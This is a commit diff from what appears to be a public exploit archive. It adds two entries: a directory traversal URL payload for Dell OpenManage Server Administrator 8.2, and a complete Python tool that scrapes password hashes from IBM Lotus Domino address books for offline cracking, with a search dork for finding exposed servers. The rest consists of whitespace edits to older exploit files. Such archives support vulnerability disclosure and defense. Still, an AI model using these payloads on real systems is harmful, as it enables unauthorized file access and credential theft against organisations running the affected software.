DB: 2016-02-26

2 new exploits
2016-02-26 05:02:33 +00:00 · 2016-02-26 05:02:33 +00:00 · 9eb7ef4903
commit 9eb7ef4903
parent 5f28d68611
22 changed files with 189 additions and 57 deletions
--- a/files.csv
+++ b/files.csv
@ -35723,6 +35723,7 @@ id,file,description,date,author,platform,type,port
 39483,platforms/multiple/dos/39483.txt,"Wireshark - add_ff_vht_compressed_beamforming_report Static Out-of-Bounds Read",2016-02-22,"Google Security Research",multiple,dos,0
 39484,platforms/multiple/dos/39484.txt,"Wireshark - dissect_ber_set Static Out-of-Bounds Read",2016-02-22,"Google Security Research",multiple,dos,0
 39485,platforms/asp/webapps/39485.txt,"Thru Managed File Transfer Portal 9.0.2 - SQL Injection",2016-02-22,"SySS GmbH",asp,webapps,80
+39486,platforms/windows/webapps/39486.txt,"Dell OpenManage Server Administrator 8.2 - Authenticated Directory Traversal",2016-02-23,hantwister,windows,webapps,0
 39487,platforms/multiple/dos/39487.py,"libquicktime 1.2.4 - Integer Overflow",2016-02-23,"Marco Romano",multiple,dos,0
 39488,platforms/json/webapps/39488.txt,"Ubiquiti Networks UniFi 3.2.10 - CSRF Vulnerability",2016-02-23,"Julien Ahrens",json,webapps,8443
 39489,platforms/php/webapps/39489.py,"WordPress Extra User Details Plugin 0.4.2 - Privilege Escalation",2016-02-24,"Panagiotis Vagenas",php,webapps,80
@ -35731,3 +35732,4 @@ id,file,description,date,author,platform,type,port
 39492,platforms/linux/dos/39492.txt,"libxml2 - xmlParseEndTag2 Heap-Based Buffer Overread",2016-02-24,"Google Security Research",linux,dos,0
 39493,platforms/linux/dos/39493.txt,"libxml2 - xmlParserPrintFileContextInternal Heap-Based Buffer Overread",2016-02-24,"Google Security Research",linux,dos,0
 39494,platforms/linux/dos/39494.txt,"libxml2 - htmlCurrentChar Heap-Based Buffer Overread",2016-02-24,"Google Security Research",linux,dos,0
+39495,platforms/windows/webapps/39495.py,"IBM Lotus Domino <= R8 Password Hash Extraction Exploit",2016-02-25,"Jonathan Broche",windows,webapps,0
--- a/platforms/bsd/remote/105.pl
+++ b/platforms/bsd/remote/105.pl
@ -41,6 +41,6 @@ sleep(1); #you might have to adjust this on slow connections
 print $socket $buf;

 close($socket);
-
-
-# milw0rm.com [2003-09-27]
+
+
+# milw0rm.com [2003-09-27]
--- a/platforms/linux/dos/115.c
+++ b/platforms/linux/dos/115.c
@ -105,6 +105,6 @@ void usage( char *program )
 	fprintf(stdout, "USAGE: <%s> <IP> <PORT> <USER> <PASS> <LOOP>\n", program);
  	exit(0);
 }
-
-
-// milw0rm.com [2003-10-31]
+
+
+// milw0rm.com [2003-10-31]
--- a/platforms/linux/dos/68.c
+++ b/platforms/linux/dos/68.c
@ -67,6 +67,6 @@ int main(void)
            (xdrproc_t) xdr_void, NULL, tv);

  return 0;
-}
-
-// milw0rm.com [2003-07-29]
+}
+
+// milw0rm.com [2003-07-29]
--- a/platforms/linux/local/104.c
+++ b/platforms/linux/local/104.c
@ -55,6 +55,6 @@ int main()

 	execle (BIN, BIN, "-I", out, 0x0, own, 0x0);
 }
-
-
-// milw0rm.com [2003-09-21]
+
+
+// milw0rm.com [2003-09-21]
--- a/platforms/linux/local/12.c
+++ b/platforms/linux/local/12.c
@ -198,6 +198,6 @@ int main(int ac, char **av)
    return 0;
 }

-
-
-// milw0rm.com [2003-04-14]
+
+
+// milw0rm.com [2003-04-14]
--- a/platforms/linux/local/21.c
+++ b/platforms/linux/local/21.c
@ -256,6 +256,6 @@ void banrl()
 	fprintf(stdout,"                                by Xpl017Elz\n\n");
 }

-
-
-// milw0rm.com [2003-04-29]
+
+
+// milw0rm.com [2003-04-29]
--- a/platforms/linux/local/72.c
+++ b/platforms/linux/local/72.c
@ -63,6 +63,6 @@ putenv(egg);
 execl(BIN,BIN,"-display",buff,NULL);
 }

-
-
-// milw0rm.com [2003-08-01]
+
+
+// milw0rm.com [2003-08-01]
--- a/platforms/linux/local/91.c
+++ b/platforms/linux/local/91.c
@ -137,6 +137,6 @@ SSL_FILETYPE_PEM) <= 0)
    if (!SSL_CTX_check_private_key(ctx))
        exit(1);
 }
-
-
-// milw0rm.com [2003-09-05]
+
+
+// milw0rm.com [2003-09-05]
--- a/platforms/linux/remote/110.c
+++ b/platforms/linux/remote/110.c
@ -698,6 +698,6 @@ struct timespec t;
 t.tv_sec=0;
 t.tv_nsec=n;
 nanosleep(&t,&t);
-}
-
-// milw0rm.com [2003-10-13]
+}
+
+// milw0rm.com [2003-10-13]
--- a/platforms/linux/remote/63.c
+++ b/platforms/linux/remote/63.c
@ -535,6 +535,6 @@ int main(int argc, char **argv)
 	
 	return 0;
 }
-
-
-// milw0rm.com [2003-07-25]
+
+
+// milw0rm.com [2003-07-25]
--- a/platforms/linux/remote/88.c
+++ b/platforms/linux/remote/88.c
@ -418,6 +418,6 @@ void usage(char *name){
 " -d\t\tdo not show verbose ftp in/out traffic.\n\n",
 name,port,sport,DFLUSER,DFLPASS,DFLDIR,DFLADDR,align,attempts);
 exit(0);
-}
-
-// milw0rm.com [2003-08-28]
+}
+
+// milw0rm.com [2003-08-28]
--- a/platforms/linux/remote/89.c
+++ b/platforms/linux/remote/89.c
@ -330,6 +330,6 @@ void sendstr(int sd,char *str,int length)
        write(sd,str,length);
 	sleep(1);
 }
-
-
-// milw0rm.com [2003-08-29]
+
+
+// milw0rm.com [2003-08-29]
--- a/platforms/linux/remote/98.c
+++ b/platforms/linux/remote/98.c
@ -290,6 +290,6 @@ void sqlerror(char *s)
    fprintf(stderr,"FAILED\n[-] %s:%s\n",s,mysql_error(conn));
    mysql_close(conn);
    exit(0);
-}
-
-// milw0rm.com [2003-09-14]
+}
+
+// milw0rm.com [2003-09-14]
--- a/platforms/multiple/remote/67.c
+++ b/platforms/multiple/remote/67.c
@ -333,6 +333,6 @@ void my_sleep(int n) {
        t.tv_sec=0;
        t.tv_nsec=n;
        nanosleep(&t,&t);
-}
-
-// milw0rm.com [2003-07-28]
+}
+
+// milw0rm.com [2003-07-28]
--- a/platforms/windows/dos/65.c
+++ b/platforms/windows/dos/65.c
@ -108,6 +108,6 @@ int main(int argc, char* argv[])
 Exit0:
 	
 	return 0;
-}
-
-// milw0rm.com [2003-07-25]
+}
+
+// milw0rm.com [2003-07-25]
--- a/platforms/windows/dos/73.c
+++ b/platforms/windows/dos/73.c
@ -144,6 +144,6 @@ int main(int argc, char **argv)

  WSACleanup();

-}
-
-// milw0rm.com [2003-08-01]
+}
+
+// milw0rm.com [2003-08-01]
--- a/platforms/windows/remote/112.c
+++ b/platforms/windows/remote/112.c
@ -87,6 +87,6 @@ int main(int argc, char *argv[]) {
 		exit(1);
 	}
 }
-
-
-// milw0rm.com [2003-10-21]
+
+
+// milw0rm.com [2003-10-21]
--- a/platforms/windows/remote/83.html
+++ b/platforms/windows/remote/83.html
@ -99,6 +99,6 @@ f.Close
 Set shell=CreateObject("WScript.Shell")
 shell.run(pth)

-</script>
-
-// milw0rm.com [2003-08-21]
+</script>
+
+// milw0rm.com [2003-08-21]
--- a/platforms/windows/remote/90.c
+++ b/platforms/windows/remote/90.c
@ -218,6 +218,6 @@ main (int argc, char *argv[])

 	return 0; /* dead code */
 }
-
-
-// milw0rm.com [2003-09-01]
+
+
+// milw0rm.com [2003-09-01]
--- a/platforms/windows/webapps/39486.txt
+++ b/platforms/windows/webapps/39486.txt
@ -0,0 +1,27 @@
+# Exploit Title: Dell OpenManage Server Administrator 8.2 Authenticated
+Directory Traversal
+# Date: February 22, 2016
+# Exploit Author: hantwister
+# Vendor Homepage: http://www.dell.com/
+# Software Link:
+http://www.dell.com/support/contents/us/en/19/article/Product-Support/Self-support-Knowledgebase/enterprise-resource-center/Enterprise-Tools/OMSA
+# Version: 8.2
+# Tested on: Windows 7 x64
+
+When authenticated as an admin, make the following adjustments to the URL
+below:
+
+1) Substitute "<IP>" for the target;
+2) Substitute "Windows\WindowsUpdate.log" for the desired file;
+3) Substitute the value of the vid parameter and the folder name preceding
+"/ViewFile" with the vid parameter from your current session.
+
+https://
+<IP>:1311/0123456789ABCDEF/ViewFile?path=\temp&file=hello\..\..\..\..\..\..\..\..\Windows\WindowsUpdate.log&vid=0123456789ABCDEF
+
+In the file parameter, "hello" can be changed to any other name; the folder
+need not exist. However, the file parameter must not start with a common
+file path separator, nor a dot character.
+
+The path parameter should not be changed; the provided value is essential
+to bypassing a security control.
--- a/platforms/windows/webapps/39495.py
+++ b/platforms/windows/webapps/39495.py
@ -0,0 +1,103 @@
+# Exploit Title: IBM Lotus Domino <= R8 Password Hash Extraction Exploit
+# Google Dork: inurl:names.nsf?opendatabase
+# Date: 02-24-2016
+# Exploit Author: Jonathan Broche
+# Contact: https://twitter.com/g0jhonny
+# Vendor Homepage: https://www-01.ibm.com/software/lotus/category/messaging/
+# Tested on: Lotus Domino 8.5
+# CVE : CVE-2005-2428
+
+1. Description
+
+IBM Domino Databases contain a configuration issue allowing users to obtain password hashes, configuraiton information and more from the Public Address Book (i.e., names.nsf database). Password hashes are obtained from the hidden HTML HTTPPassword and dspHTTPPassword fields per user in the database.
+
+2. Proof of Concept
+
+#!/usr/bin/env python2
+
+import requests, re, BeautifulSoup, sys, argparse, os
+requests.packages.urllib3.disable_warnings()
+
+
+parser = argparse.ArgumentParser(description='Domino Effect - A Lotus Domino password hash tool by Jonathan Broche (@g0jhonny)', version="1.0")
+parser.add_argument('system', help="IP address or hostname to harvest hashes from. ")
+parser.add_argument('-u', '--uri', metavar='path', default="/names.nsf", help="Path to the names.nsf file. [Default: /names.nsf]")
+outgroup = parser.add_argument_group(title="Output Options")
+outgroup.add_argument('--hashcat', action='store_true',  help="Print results for use with hashcat.")
+outgroup.add_argument('--john', action='store_true', help="Print results for use with John the Ripper.")
+
+if len(sys.argv) == 1:
+    parser.print_help()
+    sys.exit(1)
+
+args = parser.parse_args()
+print "\nDomino Effect {}\n".format(parser.version)
+
+headers={'User-Agent':'Mozilla/5.0 (X11; U; Linux i686; en-US) AppleWebKit/534.3 (KHTML, like Gecko) Chrome/6.0.472.63 Safari/534.3'}
+
+
+try:
+    response = requests.get("https://{}{}/People?OpenView".format(args.system, args.uri), verify=False, headers=headers, timeout=3)
+except requests.exceptions.Timeout as e:
+    print "[!] Timed out, try again."
+    sys.exit(1)
+except Exception as e:
+        print e
+
+soup = BeautifulSoup.BeautifulSoup(response.text)
+
+links = []
+
+#grab all user profile links
+for link in soup.findAll('a'):
+    if "OpenDocument" in link['href']:
+        if link['href'] not in links:
+	        links.append(link['href'])
+
+hashes = {}
+for link in links: #get user profile
+    try:
+        response = requests.get("https://{}{}".format(args.system, link), verify=False, headers=headers, timeout=2)
+    except requests.exceptions.Timeout as e:
+        pass
+    except Exception as e:
+        print e
+
+    if response.text:
+        soup = BeautifulSoup.BeautifulSoup(response.text)
+
+        name = soup.find('input', {'name' : '$dspShortName'}).get('value').strip() #short name
+        httppassword = soup.find('input', { "name" : "HTTPPassword"}).get('value').strip()
+        dsphttppassword = soup.find('input', { "name" : "dspHTTPPassword"}).get('value').strip()
+        
+        if httppassword and httppassword not in hashes.keys():
+            hashes[httppassword] = name
+        elif dsphttppassword and dsphttppassword not in hashes.keys():
+            hashes[dsphttppassword] = name      
+
+if hashes: #output
+    if args.hashcat or args.john:
+        if args.hashcat:
+            for h in hashes.keys():
+                print h
+        if args.john:
+            for h, n in hashes.items():
+                print "{}:{}".format(n,h)
+    else:
+        for h, n in hashes.items():
+            print "[*] User: {} Hash: {}".format(n, h)
+
+
+print "\n{} hashes obtained\n".format(len(hashes))
+
+3. Solution
+
+To hide the HTTP password from the HTML source: 
+
+1) Open the $PersonalInheritableSchema subform (In the designer under Shared Code, Subforms).
+2) Find the fields: $dspHTTPPassword and HTTPPassword.
+3) In the field properties for both fields, on the hide tab under "Hide paragram from" check off "Web browsers".
+4) Open the Person form (Under Forms).
+5) In the form properties, on the 2nd tab, disable the option "Generate HTML for all fields".
+
+In addition, ensure proper firewalls are in place within your environment to prevent public exposure of the names.nsf database and other senstive files.